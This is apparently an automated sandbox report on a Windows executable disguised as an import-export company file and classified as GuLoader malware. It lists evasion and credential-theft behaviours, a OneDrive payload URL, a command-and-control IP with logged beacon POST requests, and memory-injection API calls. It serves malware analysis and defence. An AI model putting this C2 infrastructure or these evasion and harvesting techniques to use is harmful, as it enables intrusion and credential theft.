Play interactive tour

Edit tour

Windows Analysis Report KHAWATMI CO.IMPORT & EXPORT.exe

Overview

General Information

Sample Name:	KHAWATMI CO.IMPORT & EXPORT.exe
Analysis ID:	458277
MD5:	0153ae8cf4b1f546721332b5cb3f973c
SHA1:	479858ef740172cb3791527a9c9d0da76eec3af4
SHA256:	97fee7e2c533d7ad3854cd92d9d2dbcddeb3b08e3e0cb14214b431d3970cda45
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

GuLoader behavior detected

Multi AV Scanner detection for submitted file

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

KHAWATMI CO.IMPORT & EXPORT.exe (PID: 5804 cmdline: 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe' MD5: 0153AE8CF4B1F546721332B5CB3F973C)

KHAWATMI CO.IMPORT & EXPORT.exe (PID: 6316 cmdline: 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe' MD5: 0153AE8CF4B1F546721332B5CB3F973C)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://onedrive.live.com/download?cid=7B0580AA0B18AE"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=7B0580AA0B18AE"}

Multi AV Scanner detection for submitted file

Show sources

Source: KHAWATMI CO.IMPORT & EXPORT.exe

ReversingLabs: Detection: 13%

Source: KHAWATMI CO.IMPORT & EXPORT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://onedrive.live.com/download?cid=7B0580AA0B18AE

Source: Joe Sandbox View

IP Address: 185.227.139.18 185.227.139.18

Source: global traffic	HTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 163Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18
Source: unknown	TCP traffic detected without corresponding DNS query: 185.227.139.18

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: unknown

HTTP traffic detected: POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.227.139.18Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 976E9D7AContent-Length: 190Connection: close

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Aug 2021 06:12:26 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2

Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029956322.000000001E2A6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsoft
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1029956322.000000001E2A6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=7B0580AA0B18AE44&resid=7B0580AA0B18AE44%21106&authkey=ANqAOzg

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Code function: 1_2_004028B8 GetAsyncKeyState,

1_2_004028B8

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1611B NtWriteVirtualMemory,	1_2_03D1611B
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1A932 NtWriteVirtualMemory,LoadLibraryA,NtProtectVirtualMemory,	1_2_03D1A932
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D166C6 NtAllocateVirtualMemory,	1_2_03D166C6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D151C1 NtWriteVirtualMemory,	1_2_03D151C1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D145CD NtWriteVirtualMemory,	1_2_03D145CD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D14DF2 NtWriteVirtualMemory,	1_2_03D14DF2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D16BFE NtWriteVirtualMemory,	1_2_03D16BFE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D153E5 NtWriteVirtualMemory,	1_2_03D153E5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D10BEC NtWriteVirtualMemory,	1_2_03D10BEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D16795 NtAllocateVirtualMemory,	1_2_03D16795
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19D8D NtWriteVirtualMemory,	1_2_03D19D8D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D157AF NtWriteVirtualMemory,	1_2_03D157AF
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D14F79 NtWriteVirtualMemory,	1_2_03D14F79
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D15B65 NtWriteVirtualMemory,	1_2_03D15B65
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1556D NtWriteVirtualMemory,	1_2_03D1556D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D15B03 NtWriteVirtualMemory,	1_2_03D15B03
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D14CD1 NtWriteVirtualMemory,	1_2_03D14CD1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D152C9 NtWriteVirtualMemory,	1_2_03D152C9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D158CD NtWriteVirtualMemory,	1_2_03D158CD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1B4F9 NtWriteVirtualMemory,	1_2_03D1B4F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D126E7 NtWriteVirtualMemory,	1_2_03D126E7
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D15681 NtWriteVirtualMemory,	1_2_03D15681
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D15072 NtWriteVirtualMemory,	1_2_03D15072
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1547B NtWriteVirtualMemory,	1_2_03D1547B
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1347D NtWriteVirtualMemory,	1_2_03D1347D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D15A25 NtWriteVirtualMemory,	1_2_03D15A25
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 24_2_0056B6B4 LdrInitializeThunk,NtProtectVirtualMemory,	24_2_0056B6B4
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 24_2_0056B7E6 Sleep,NtProtectVirtualMemory,	24_2_0056B7E6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 24_2_0056B811 NtProtectVirtualMemory,	24_2_0056B811
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 24_2_0056B727 NtProtectVirtualMemory,	24_2_0056B727
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 24_2_0056B6AD LdrInitializeThunk,NtProtectVirtualMemory,	24_2_0056B6AD

Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1ADC1	1_2_03D1ADC1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1B3EA	1_2_03D1B3EA
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1611B	1_2_03D1611B
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1A932	1_2_03D1A932
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D10F36	1_2_03D10F36
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D166C6	1_2_03D166C6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D10680	1_2_03D10680
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D107D1	1_2_03D107D1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19FD4	1_2_03D19FD4
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D151C1	1_2_03D151C1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D145CD	1_2_03D145CD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1ADCD	1_2_03D1ADCD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1B1CF	1_2_03D1B1CF
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19FCE	1_2_03D19FCE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D14DF2	1_2_03D14DF2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19FF2	1_2_03D19FF2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D111F5	1_2_03D111F5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D123F9	1_2_03D123F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D135F9	1_2_03D135F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D16BFE	1_2_03D16BFE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D153E5	1_2_03D153E5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D163E6	1_2_03D163E6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D10BEC	1_2_03D10BEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19FEC	1_2_03D19FEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1A18A	1_2_03D1A18A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19D8D	1_2_03D19D8D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D145B3	1_2_03D145B3
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D197B7	1_2_03D197B7
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D117A1	1_2_03D117A1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1AFA5	1_2_03D1AFA5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D157AF	1_2_03D157AF
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D149AE	1_2_03D149AE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D10F51	1_2_03D10F51
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D13951	1_2_03D13951
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1415D	1_2_03D1415D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D11546	1_2_03D11546
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1374E	1_2_03D1374E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D10F77	1_2_03D10F77
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D14F79	1_2_03D14F79
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1317D	1_2_03D1317D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D18F7D	1_2_03D18F7D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D12F7E	1_2_03D12F7E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D10361	1_2_03D10361
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1556D	1_2_03D1556D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1131A	1_2_03D1131A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1311C	1_2_03D1311C
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D12B1E	1_2_03D12B1E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D15B03	1_2_03D15B03
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D11107	1_2_03D11107
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19D39	1_2_03D19D39
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19F3A	1_2_03D19F3A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D16D27	1_2_03D16D27
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19529	1_2_03D19529
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1AF29	1_2_03D1AF29
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1972D	1_2_03D1972D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D14CD1	1_2_03D14CD1
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D134D3	1_2_03D134D3
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D140DC	1_2_03D140DC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D152C9	1_2_03D152C9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D158CD	1_2_03D158CD
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1B4F9	1_2_03D1B4F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D11EE2	1_2_03D11EE2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D108E5	1_2_03D108E5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D126E7	1_2_03D126E7
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D194E6	1_2_03D194E6
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1B091	1_2_03D1B091
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D15681	1_2_03D15681
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1B6B4	1_2_03D1B6B4
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1AEBB	1_2_03D1AEBB
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1AE57	1_2_03D1AE57
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1964D	1_2_03D1964D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D15072	1_2_03D15072
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D19E75	1_2_03D19E75
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1547B	1_2_03D1547B
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1347D	1_2_03D1347D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D11665	1_2_03D11665
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1141F	1_2_03D1141F
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D16C1E	1_2_03D16C1E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1B036	1_2_03D1B036
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D18C3C	1_2_03D18C3C
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D1303F	1_2_03D1303F
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D15A25	1_2_03D15A25
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe	Code function: 1_2_03D13827	1_2_03D13827

Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.602829141.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.603288987.00000000021F0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs KHAWATMI CO.IMPORT & EXPORT.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000000.601895516.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameTolip.exe vs KHAWATMI CO.IMPORT & EXPORT.exe
